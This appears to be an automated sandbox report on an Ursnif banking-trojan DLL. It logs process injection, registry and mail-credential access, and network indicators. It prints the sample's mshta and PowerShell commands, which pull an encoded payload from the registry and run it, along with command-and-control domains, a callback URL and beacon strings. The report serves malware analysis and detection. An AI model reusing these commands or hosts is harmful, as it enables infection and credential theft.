Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8F7000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8DFD4F1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 376E38B000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 209AB9B0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 42F449C000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 165793D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: D1A98EB000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EEFEFF0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000001D.00000002.501859313.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02824270 cpuid

0_2_02824270

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\loaddll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

0_2_73CA19DA

Queries the installation date of Windows

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0281190E CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

0_2_0281190E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73CA13E4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_73CA13E4

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0281B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

0_2_0281B868

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73CA1371 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_73CA1371

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.241.19.44	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
myip.opendns.com	84.17.52.25	true
c56.lepini.at	47.241.19.44	true
resolver1.opendns.com	208.67.222.222	true
api3.lepini.at	47.241.19.44	true
api10.laptok.at	47.241.19.44	true
g.msn.com	unknown	unknown
222.222.67.208.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_2Fdgzow/MjYIlNw6pXOFZtoH/ck22OsEBi4g5A21/99QRfbFqCod1fjkNsK/XxVSIrdVG/7FHa2ER9Ft02LqAkeU18/04NkD5rjB5JZqGFdQLM/maVmTCXIlwp0EX02aBt_2F/Clo4eegFdQ1lk/P1pW4ZJ5/wIbd6IdM2um9GQiRmu4HTYW/_2FpOuqNYz/HTi5jYJ7JeAd_0A_0/Dg9X8gZJHmh_/2B_2FHgF5eg/hemqUNvmE05Kam/e7yAaZ9rb60RXTZYuOS2q/HQUlA_2F4Fhmtp/3js	false	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: earmarkavchd.dll

Avira: detected

Found malware configuration

Source: loaddll32.exe.4396.0.memstr

Multi AV Scanner detection for submitted file

Source: earmarkavchd.dll

ReversingLabs: Detection: 45%

Machine Learning detection for sample

Source: earmarkavchd.dll

Joe Sandbox ML: detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02828A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_02828A61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02826E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_02826E86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02813DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_02813DEE
Source: C:\Windows\explorer.exe	Code function: 29_2_03B791A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	29_2_03B791A0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B537B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,	29_2_03B537B8

Source: C:\Windows\System32\loaddll32.exe

0_2_02831C05

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp	String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Uses nslookup.exe to query domains

Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

HTTP GET or POST without a user agent

Source: global traffic

